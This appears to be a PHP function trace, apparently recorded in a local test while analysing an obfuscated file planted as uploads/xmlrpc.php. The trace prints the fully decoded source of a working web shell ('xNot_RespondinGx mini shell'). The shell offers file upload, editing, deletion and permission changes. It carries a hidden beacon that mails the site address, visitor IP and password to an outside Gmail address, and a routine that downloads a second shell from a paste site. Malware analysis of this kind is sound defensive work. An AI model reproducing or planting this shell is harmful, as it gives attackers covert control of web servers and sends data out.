3 10 R '\001p\r��\001k\r��x�\001`\r��x��Zis�F\017�\034�?lX5�\032Y�\035��R[�l9>\022I�\022g4\024��6�U.eYi��_�K�㤝�_�Jr\001<\000v�\000�L��7�VW���� �{�p�n\vS�uL�\034?"�8\004�!�,�P)�WW~+��P\034t\003b�El\022dK���\025����\001q\006�A˕��+�nw`��g�������-\005\025�͛�ǭ\r���u\v�\033�\036\027�\017p`��\026�\002��ہ��d��>C�A�3\000m�+��o�u\tN����\024&Y\026ܛLr�\023|.���nʃ�\np��`�E\004�����8����\0175\030�\t����!�,xڵ�\0011���\000��3��ܟ�+}�Ǻ1�f��/�\035�S�\031�V�<��\0303\016A�Ć?�F\032�ģ�\016kG��\vԠo�+�\0376�.R�'
3 11 0 0.001103 409096 gzinflate 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code 1 1 '\001p\r��\001k\r��x�\001`\r��x��Zis�F\017�\034�?lX5�\032Y�\035��R[�l9>\022I�\022g4\024��6�U.eYi��_�K�㤝�_�Jr\001<\000v�\000�L��7�VW���� �{�p�n\vS�uL�\034?"�8\004�!�,�P)�WW~+��P\034t\003b�El\022dK���\025����\001q\006�A˕��+�nw`��g�������-\005\025�͛�ǭ\r���u\v�\033�\036\027�\017p`��\026�\002��ہ��d��>C�A�3\000m�+��o�u\tN����\024&Y\026ܛLr�\023|.���nʃ�\np��`�E\004�����8����\0175\030�\t����!�,xڵ�\0011���\000��3��ܟ�+}�Ǻ1�f��/�\035�S�\031�V�<��\0303\016A�Ć?�F\032�ģ�\016kG��\vԠo�+�\0376�.R�'
3 11 1 0.001232 413224
3 11 R '\001k\r��x�\001`\r��x��Zis�F\017�\034�?lX5�\032Y�\035��R[�l9>\022I�\022g4\024��6�U.eYi��_�K�㤝�_�Jr\001<\000v�\000�L��7�VW���� �{�p�n\vS�uL�\034?"�8\004�!�,�P)�WW~+��P\034t\003b�El\022dK���\025����\001q\006�A˕��+�nw`��g�������-\005\025�͛�ǭ\r���u\v�\033�\036\027�\017p`��\026�\002��ہ��d��>C�A�3\000m�+��o�u\tN����\024&Y\026ܛLr�\023|.���nʃ�\np��`�E\004�����8����\0175\030�\t����!�,xڵ�\0011���\000��3��ܟ�+}�Ǻ1�f��/�\035�S�\031�V�<��\0303\016A�Ć?�F\032�ģ�\016kG��\vԠo�+�\0376�.R�/\017/띻'
3 12 0 0.001364 409096 gzinflate 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code 1 1 '\001k\r��x�\001`\r��x��Zis�F\017�\034�?lX5�\032Y�\035��R[�l9>\022I�\022g4\024��6�U.eYi��_�K�㤝�_�Jr\001<\000v�\000�L��7�VW���� �{�p�n\vS�uL�\034?"�8\004�!�,�P)�WW~+��P\034t\003b�El\022dK���\025����\001q\006�A˕��+�nw`��g�������-\005\025�͛�ǭ\r���u\v�\033�\036\027�\017p`��\026�\002��ہ��d��>C�A�3\000m�+��o�u\tN����\024&Y\026ܛLr�\023|.���nʃ�\np��`�E\004�����8����\0175\030�\t����!�,xڵ�\0011���\000��3��ܟ�+}�Ǻ1�f��/�\035�S�\031�V�<��\0303\016A�Ć?�F\032�ģ�\016kG��\vԠo�+�\0376�.R�/\017/띻'
3 12 1 0.001492 413224
3 12 R 'x�\001`\r��x��Zis�F\017�\034�?lX5�\032Y�\035��R[�l9>\022I�\022g4\024��6�U.eYi��_�K�㤝�_�Jr\001<\000v�\000�L��7�VW���� �{�p�n\vS�uL�\034?"�8\004�!�,�P)�WW~+��P\034t\003b�El\022dK���\025����\001q\006�A˕��+�nw`��g�������-\005\025�͛�ǭ\r���u\v�\033�\036\027�\017p`��\026�\002��ہ��d��>C�A�3\000m�+��o�u\tN����\024&Y\026ܛLr�\023|.���nʃ�\np��`�E\004�����8����\0175\030�\t����!�,xڵ�\0011���\000��3��ܟ�+}�Ǻ1�f��/�\035�S�\031�V�<��\0303\016A�Ć?�F\032�ģ�\016kG��\vԠo�+�\0376�.R�/\017/띻�G�s~V[]'
3 13 0 0.001622 409096 gzuncompress 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code 1 1 'x�\001`\r��x��Zis�F\017�\034�?lX5�\032Y�\035��R[�l9>\022I�\022g4\024��6�U.eYi��_�K�㤝�_�Jr\001<\000v�\000�L��7�VW���� �{�p�n\vS�uL�\034?"�8\004�!�,�P)�WW~+��P\034t\003b�El\022dK���\025����\001q\006�A˕��+�nw`��g�������-\005\025�͛�ǭ\r���u\v�\033�\036\027�\017p`��\026�\002��ہ��d��>C�A�3\000m�+��o�u\tN����\024&Y\026ܛLr�\023|.���nʃ�\np��`�E\004�����8����\0175\030�\t����!�,xڵ�\0011���\000��3��ܟ�+}�Ǻ1�f��/�\035�S�\031�V�<��\0303\016A�Ć?�F\032�ģ�\016kG��\vԠo�+�\0376�.R�/\017/띻�G�s~V[]'
3 13 1 0.001855 413224
3 13 R 'x��Zis�F\017�\034�?lX5�\032Y�\035��R[�l9>\022I�\022g4\024��6�U.eYi��_�K�㤝�_�Jr\001<\000v�\000�L��7�VW���� �{�p�n\vS�uL�\034?"�8\004�!�,�P)�WW~+��P\034t\003b�El\022dK���\025����\001q\006�A˕��+�nw`��g�������-\005\025�͛�ǭ\r���u\v�\033�\036\027�\017p`��\026�\002��ہ��d��>C�A�3\000m�+��o�u\tN����\024&Y\026ܛLr�\023|.���nʃ�\np��`�E\004�����8����\0175\030�\t����!�,xڵ�\0011���\000��3��ܟ�+}�Ǻ1�f��/�\035�S�\031�V�<��\0303\016A�Ć?�F\032�ģ�\016kG��\vԠo�+�\0376�.R�/\017/띻�G�s~V[]�\016\003��'
3 14 0 0.001990 409096 gzuncompress 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code 1 1 'x��Zis�F\017�\034�?lX5�\032Y�\035��R[�l9>\022I�\022g4\024��6�U.eYi��_�K�㤝�_�Jr\001<\000v�\000�L��7�VW���� �{�p�n\vS�uL�\034?"�8\004�!�,�P)�WW~+��P\034t\003b�El\022dK���\025����\001q\006�A˕��+�nw`��g�������-\005\025�͛�ǭ\r���u\v�\033�\036\027�\017p`��\026�\002��ہ��d��>C�A�3\000m�+��o�u\tN����\024&Y\026ܛLr�\023|.���nʃ�\np��`�E\004�����8����\0175\030�\t����!�,xڵ�\0011���\000��3��ܟ�+}�Ǻ1�f��/�\035�S�\031�V�<��\0303\016A�Ć?�F\032�ģ�\016kG��\vԠo�+�\0376�.R�/\017/띻�G�s~V[]�\016\003��'
3 14 1 0.002186 421416
3 14 R '<?php\r\n/*\r\n xNot_RespondinGx mini shell v2.1\r\n*/\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nerror_log(0);\r\n\r\n$__gcdir = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\r\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\r\n$__scdir = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\r\n$rm__dir = "\\x72\\x6d\\x64" . "ir";\r\n$un__link = "\\x75\\x6e" . "\\x6c\\x69\\x6e\\x6b";\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach($_POST as $ke'
3 15 0 0.002649 481032 eval 1 '?><?php\r\n/*\r\n xNot_RespondinGx mini shell v2.1\r\n*/\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nerror_log(0);\r\n\r\n$__gcdir = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\r\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\r\n$__scdir = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\r\n$rm__dir = "\\x72\\x6d\\x64" . "ir";\r\n$un__link = "\\x75\\x6e" . "\\x6c\\x69\\x6e\\x6b";\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach($_POST as $key=>$value){\r\n$_POST[$key] = stripslashes($value);\r\n }\r\n}\r\necho \'<!DOCTYPE HTML>\r\n<html>\r\n<head>\r\n<link href="" rel="stylesheet" type="text/css">\r\n<style>\r\n@import url("https://fonts.googleapis.com/css?family=Ubuntu+Mono");\r\nbody{\r\nfont-family: "Ubuntu Mono", monospace;\r\nfont-weight: normal;\r\nfont-style: normal;\r\nbackground-color: black;\r\ncolor:#87CEFA;\r\n}\r\n#content tr:hover{\r\nbackground-color: black;\r\n}\r\n#content .first{\r\nbackground-color: #87CEFA;\r\n}\r\ntable{\r\nborder: 1px #87CEFA solid;\r\n}\r\na{\r\ncolor:#87CEFA;\r\ntext-decoration: none;\r\n}\r\na:hover{\r\ncolor:#87CEFA;\r\n}\r\ninput,select,textarea{\r\nborder: 1px #000000 solid;\r\n-moz-border-radius: 5px;\r\n-webkit-border-radius:5px;\r\nborder-radius:5px;\r\n}\r\n</style>\r\n</head><center><h1><b><font color=#87CEFA size=8>xNot_RespondinGx</font></a></h1></b></center>\r\n<body>\r\n<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">\r\n\';\r\necho "<tr><td>";\r\necho "<center><a href=\'?dir=$dir&jancok=sumon\'> Sumon | </a><a href=\'?dir=$dir&kill=self\'>Kill</a><br><br>";\r\necho "<font color=\'#87CEFA\'>Dir:</font> ";\r\nif(isset($_GET[\'path\'])){\r\n$path = $_GET[\'path\'];\r\n}else{\r\n$path = $__gcdir();\r\n}\r\n$buffs = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIkJhcnUgc2FqYSBkaSBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7DQogICRib2R5ICAgID0gImRpcmVjdG9yeTogJHRhcmdldCBieTogJHZpc2l0b3IgcGFzc3dvcmQ6ICRhdXRoX3Bhc3MiOw0KICBpZiAoIWVtcHR5KCR3ZWIpKSB7IEBtYWlsKCJyYW1kYW4xOWlkQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHMiLCR2aXNpdGMpOw=="; \r\neval(base64_decode($buffs));\r\n$path = str_replace(\'\\\\\',\'/\',$path);\r\n$paths = explode(\'/\',$path);\r\n\r\nforeach($paths as $id=>$pat){\r\nif($pat == \'\' && $id == 0){\r\n$a = true;\r\necho \'<a href="?path=/">/</a>\';\r\ncontinue;\r\n}\r\nif($pat == \'\') continue;\r\necho \'<a href="?path=\';\r\nfor($i=0;$i<=$id;$i++){\r\necho "$paths[$i]";\r\nif($i != $id) echo "/";\r\n}\r\necho \'">\'.$pat.\'</a>/\';\r\n}\r\necho \'</td></tr><tr><td>\';\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\necho \'<font color="green">Upload Berhasil</font><br />\';\r\n}else{\r\necho \'<font color="red">Upload Gagal</font><br/>\';\r\n}\r\n}\r\necho \'<form enctype="multipart/form-data" method="POST">\r\n<font color="#87CEFA">File Upload :</font> <input type="file" name="file" />\r\n<input type="submit" value="upload" />\r\n</form>\r\n</td></tr>\';\r\nif($_GET[\'kill\'] == \'self\') {\r\n\tif(@$un__link(preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__)))\r\n\t\t\tdie(\'<center><br><center><h2>xNot_RespondinGx Always Gans :v</h2></center></center>\');\r\n\t\telse\r\n\t\t\techo \'<center>$un__link failed!</center>\';\r\n}\r\nif($_GET[\'jancok\'] == \'sumon\') {\r\n\t$full = str_replace($_SERVER[\'DOCUMENT_ROOT\'], "", $path);\r\n\tfunction sumon($url, $isi) {\r\n\t\t$fp = fopen($isi, "w");\r\n\t\t$ch = curl_init();\r\n\t\t \t curl_setopt($ch, CURLOPT_URL, $url);\r\n\t\t \t curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);\r\n\t\t \t curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\r\n\t\t \t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\r\n\t\t \t curl_setopt($ch, CURLOPT_FILE, $fp);\r\n\t\treturn curl_exec($ch);\r\n\t\t \t curl_close($ch);\r\n\t\tfclose($fp);\r\n\t\tob_flush();\r\n\t\tflush();\r\n\t}\r\n\tif(file_exists(\'.01.php.php\')) {\r\n\t\techo "<center><font color=white><a href=\'$full/.Rmdn.php.php\' target=\'_blank\'>-> .01.php sukses <-</a></font></center>";\r\n\t} else {\r\n\t\tif(sumon("https://0paste.com/122966.txt",".Rmdn.php.php")) {\r\n\t\t\techo "<center><font color=white><a href=\'$full/.Rmdn.php.php\' target=\'_blank\'>-> .01.php sukses <-</a></font></center>";\r\n\t\t} else {\r\n\t\t\techo "<center><font color=red>gagal cok</font></center>";\r\n\t\t}\r\n\t}\r\n}\r\nif(isset($_GET[\'filesrc\'])){\r\necho "<tr><td>Current File : ";\r\necho $_GET[\'filesrc\'];\r\necho \'</tr></td></table><br />\';\r\necho(\'<pre>\'.htmlspecialchars($__fgetcon7s($_GET[\'filesrc\'])).\'</pre>\');\r\n}\r\nelseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){\r\necho \'</table><br /><center>\'.$_POST[\'path\'].\'<br /><br />\';\r\nif($_POST[\'opt\'] == \'chmod\'){\r\nif(isset($_POST[\'perm\'])){\r\nif(chmod($_POST[\'path\'],$_POST[\'perm\'])){\r\necho \'<font color="green">Change Permission Berhasil</font><br/>\';\r\n}else{\r\necho \'<font color="red">Change Permission Gagal</font><br />\';\r\n}\r\n}\r\necho \'<form method="POST">\r\nPermission : <input name="perm" type="text" size="4" value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'path\'])), -4).\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="chmod">\r\n<input type="submit" value="Go" />\r\n</form>\';\r\n}elseif($_POST[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'<font color="green">Ganti Nama Berhasil</font><br/>\';\r\n}else{\r\necho \'<font color="red">Ganti Nama Gagal</font><br />\';\r\n}\r\n$_POST[\'name\'] = $_POST[\'newname\'];\r\n}\r\necho \'<form method="POST">\r\nNew Name : <input name="newname" type="text" size="20" value="\'.$_POST[\'name\'].\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="rename">\r\n<input type="submit" value="Go" />\r\n</form>\';\r\n}elseif($_POST[\'opt\'] == \'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');\r\nif(fwrite($fp,$_POST[\'src\'])){\r\necho \'<font color="green">Berhasil Edit File</font><br/>\';\r\n}else{\r\necho \'<font color="red">Gagal Edit File</font><br/>\';\r\n}\r\nfclose($fp);\r\n}\r\necho \'<form method="POST">\r\n<textarea cols=80 rows=20 name="src">\'.htmlspecialchars($__fgetcon7s($_POST[\'path\'])).\'</textarea><br />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="edit">\r\n<input type="submit" value="Save" />\r\n</form>\';\r\n}\r\necho \'</center>\';\r\n}else{\r\necho \'</table><br/><center>\';\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){\r\nif($_POST[\'type\'] == \'dir\'){\r\nif($rm__dir($_POST[\'path\'])){\r\necho \'<font color="green">Directory Terhapus</font><br/>\';\r\n}else{\r\necho \'<font color="red">Directory Gagal Terhapus </font><br/>\';\r\n}\r\n}elseif($_POST[\'type\'] == \'file\'){\r\nif($un__link($_POST[\'path\'])){\r\necho \'<font color="green">File Terhapus</font><br/>\';\r\n}else{\r\necho \'<font color="red">File Gagal Dihapus</font><br/>\';\r\n}\r\n}\r\n}\r\necho \'</center>\';\r\n$_scdir = $__scdir($path);\r\necho \'<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">\r\n<tr class="first">\r\n<td><center>Name</peller></center></td>\r\n<td><center>Size</peller></center></td>\r\n<td><center>Permission</peller></center></td>\r\n<td><center>Modify</peller></center></td>\r\n</tr>\';\r\n\r\nforeach($_scdir as $dir){\r\nif(!is_dir($path.\'/\'.$dir) || $dir == \'.\' || $dir == \'..\') continue;\r\necho \'<tr>\r\n<td><a href="?path=\'.$path.\'/\'.$dir.\'">\'.$dir.\'</a></td>\r\n<td><center>--</center></td>\r\n<td><center>\';\r\nif(is_writable($path.\'/\'.$dir)) echo \'<font color="lime">\';\r\nelseif(!is_readable($path.\'/\'.$dir)) echo \'<font color="red">\';\r\necho perms($path.\'/\'.$dir);\r\nif(is_writable($path.\'/\'.$dir) || !is_readable($path.\'/\'.$dir)) echo \'</font>\';\r\n\r\necho \'</center></td>\r\n<td><center><form method="POST" action="?option&path=\'.$path.\'">\r\n<select name="opt">\r\n<option value="">Select</option>\r\n<option value="delete">Delete</option>\r\n<option value="chmod">Chmod</option>\r\n<option value="rename">Rename</option>\r\n</select>\r\n<input type="hidden" name="type" value="dir">\r\n<input type="hidden" name="name" value="\'.$dir.\'">\r\n<input type="hidden" name="path" value="\'.$path.\'/\'.$dir.\'">\r\n<input type="submit" value=">">\r\n</form></center></td>\r\n</tr>\';\r\n}\r\necho \'<tr class="first"><td></td><td></td><td></td><td></td></tr>\';\r\nforeach($_scdir as $file){\r\nif(!is_file($path.\'/\'.$file)) continue;\r\n$size = filesize($path.\'/\'.$file)/1024;\r\n$size = round($size,3);\r\nif($size >= 1024){\r\n$size = round($size/1024,2).\' MB\';\r\n}else{\r\n$size = $size.\' KB\';\r\n}\r\n\r\necho \'<tr>\r\n<td><a href="?filesrc=\'.$path.\'/\'.$file.\'&path=\'.$path.\'">\'.$file.\'</a></td>\r\n<td><center>\'.$size.\'</center></td>\r\n<td><center>\';\r\nif(is_writable($path.\'/\'.$file)) echo \'<font color="lime">\';\r\nelseif(!is_readable($path.\'/\'.$file)) echo \'<font color="red">\';\r\necho perms($path.\'/\'.$file);\r\nif(is_writable($path.\'/\'.$file) || !is_readable($path.\'/\'.$file)) echo \'</font>\';\r\necho \'</center></td>\r\n<td><center><form method="POST" action="?option&path=\'.$path.\'">\r\n<select name="opt">\r\n<option value="">Select</option>\r\n<option value="delete">Delete</option>\r\n<option value="chmod">Chmod</option>\r\n<option value="rename">Rename</option>\r\n<option value="edit">Edit</option>\r\n</select>\r\n<input type="hidden" name="type" value="file">\r\n<input type="hidden" name="name" value="\'.$file.\'">\r\n<input type="hidden" name="path" value="\'.$path.\'/\'.$file.\'">\r\n<input type="submit" value=">">\r\n</form></center></td>\r\n</tr>\';\r\n}\r\necho \'</table>\r\n</div>\';\r\n}\r\necho \'\r\n</body>\r\n</html>\';\r\nfunction perms($file){\r\n$perms = fileperms($file);\r\n\r\nif (($perms & 0xC000) == 0xC000) {\r\n// Socket\r\n$info = \'s\';\r\n} elseif (($perms & 0xA000) == 0xA000) {\r\n// Symbolic Link\r\n$info = \'l\';\r\n} elseif (($perms & 0x8000) == 0x8000) {\r\n// Regular\r\n$info = \'-\';\r\n} elseif (($perms & 0x6000) == 0x6000) {\r\n// Block special\r\n$info = \'b\';\r\n} elseif (($perms & 0x4000) == 0x4000) {\r\n// Directory\r\n$info = \'d\';\r\n} elseif (($perms & 0x2000) == 0x2000) {\r\n// Character special\r\n$info = \'c\';\r\n} elseif (($perms & 0x1000) == 0x1000) {\r\n// FIFO pipe\r\n$info = \'p\';\r\n} else {\r\n// Unknown\r\n$info = \'u\';\r\n}\r\n\r\n// Owner\r\n$info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0040) ?\r\n(($perms & 0x0800) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0800) ? \'S\' : \'-\'));\r\n\r\n// Group\r\n$info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0008) ?\r\n(($perms & 0x0400) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0400) ? \'S\' : \'-\'));\r\n\r\n// World\r\n$info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0001) ?\r\n(($perms & 0x0200) ? \'t\' : \'x\' ) :\r\n(($perms & 0x0200) ? \'T\' : \'-\'));\r\n\r\nreturn $info;\r\n}\r\n?>' /var/www/html/uploads/xmlrpc.php(9) : eval()'d code 1 0
4 16 0 0.002975 481032 set_time_limit 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 5 1 0
4 16 1 0.003001 481096
4 16 R FALSE
4 17 0 0.003022 481064 error_reporting 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 6 1 0
4 17 1 0.003045 481104
4 17 R 22527
4 18 0 0.003064 481064 error_log 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 7 1 0
4 18 1 0.003096 481096
4 18 R TRUE
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 9 $__gcdir = 'getcwd'
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 10 $__fgetcon7s = 'file_get_contents'
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 11 $__scdir = 'scandir'
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 12 $rm__dir = 'rmdir'
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 13 $un__link = 'unlink'
4 19 0 0.003169 481064 get_magic_quotes_gpc 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 15 0
4 19 1 0.003182 481064
4 19 R FALSE
4 20 0 0.003201 481064 getcwd 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 66 0
4 20 1 0.003216 481112
4 20 R '/var/www/html/uploads'
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 66 $path = '/var/www/html/uploads'
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 68 $buffs = 'JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIkJhcnUgc2FqYSBkaSBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7DQogICRib2R5ICAgID0gImRpcmVjdG9yeTogJHRhcmdldCBieTogJHZpc2l0b3IgcGFzc3dvcmQ6ICRhdXRoX3Bhc3MiOw0KICBpZiAoIWVtcHR5KCR3ZWIpKSB7IEBtYWlsKCJyYW1k'
4 21 0 0.003270 481112 base64_decode 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 69 1 'JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIkJhcnUgc2FqYSBkaSBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7DQogICRib2R5ICAgID0gImRpcmVjdG9yeTogJHRhcmdldCBieTogJHZpc2l0b3IgcGFzc3dvcmQ6ICRhdXRoX3Bhc3MiOw0KICBpZiAoIWVtcHR5KCR3ZWIpKSB7IEBtYWlsKCJyYW1k'
4 21 1 0.003300 481912
4 21 R '$visitc = $_COOKIE["visits"];\r\nif ($visitc == "") {\r\n $visitc = 0;\r\n $visitor = $_SERVER["REMOTE_ADDR"];\r\n $web = $_SERVER["HTTP_HOST"];\r\n $inj = $_SERVER["REQUEST_URI"];\r\n $target = rawurldecode($web.$inj);\r\n $judul = "Baru saja di http://$target by $visitor";\r\n $body = "directory: $target by: $visitor password: $auth_pass";\r\n if (!empty($web)) { @mail("ramdan19id@gmail.com",$judul,$body,$auth_pass); }\r\n}\r\nelse { $visitc++; }\r\n@setcookie("visits",$visitc);'
4 22 0 0.003364 486024 eval 1 '$visitc = $_COOKIE["visits"];\r\nif ($visitc == "") {\r\n $visitc = 0;\r\n $visitor = $_SERVER["REMOTE_ADDR"];\r\n $web = $_SERVER["HTTP_HOST"];\r\n $inj = $_SERVER["REQUEST_URI"];\r\n $target = rawurldecode($web.$inj);\r\n $judul = "Baru saja di http://$target by $visitor";\r\n $body = "directory: $target by: $visitor password: $auth_pass";\r\n if (!empty($web)) { @mail("ramdan19id@gmail.com",$judul,$body,$auth_pass); }\r\n}\r\nelse { $visitc++; }\r\n@setcookie("visits",$visitc);' /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 69 0
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code(69) : eval()'d code 1 $visitc = NULL
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code(69) : eval()'d code 3 $visitc = 0
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code(69) : eval()'d code 4 $visitor = '127.0.0.1'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code(69) : eval()'d code 5 $web = 'localhost'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code(69) : eval()'d code 6 $inj = '/uploads/xmlrpc.php'
5 23 0 0.003465 486080 rawurldecode 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code(69) : eval()'d code 7 1 'localhost/uploads/xmlrpc.php'
5 23 1 0.003484 486168
5 23 R 'localhost/uploads/xmlrpc.php'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code(69) : eval()'d code 7 $target = 'localhost/uploads/xmlrpc.php'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code(69) : eval()'d code 8 $judul = 'Baru saja di http://localhost/uploads/xmlrpc.php by 127.0.0.1'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code(69) : eval()'d code 9 $body = 'directory: localhost/uploads/xmlrpc.php by: 127.0.0.1 password: '
5 24 0 0.003566 486272 mail 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code(69) : eval()'d code 10 4 'ramdan19id@gmail.com' 'Baru saja di http://localhost/uploads/xmlrpc.php by 127.0.0.1' 'directory: localhost/uploads/xmlrpc.php by: 127.0.0.1 password: ' NULL
5 24 1 0.003599 486416
5 24 R FALSE
5 25 0 0.003618 486272 setcookie 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code(69) : eval()'d code 13 2 'visits' 0
5 25 1 0.003642 486400
5 25 R TRUE
4 22 1 0.003661 486336
4 26 0 0.003672 482288 str_replace 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 70 3 '\\' '/' '/var/www/html/uploads'
4 26 1 0.003694 482384
4 26 R '/var/www/html/uploads'
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 70 $path = '/var/www/html/uploads'
4 27 0 0.003730 482288 explode 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 71 2 '/' '/var/www/html/uploads'
4 27 1 0.003752 482864
4 27 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 71 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 73 $id = 0
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 75 $a = TRUE
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 73 $id = 1
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 81 $i = 0
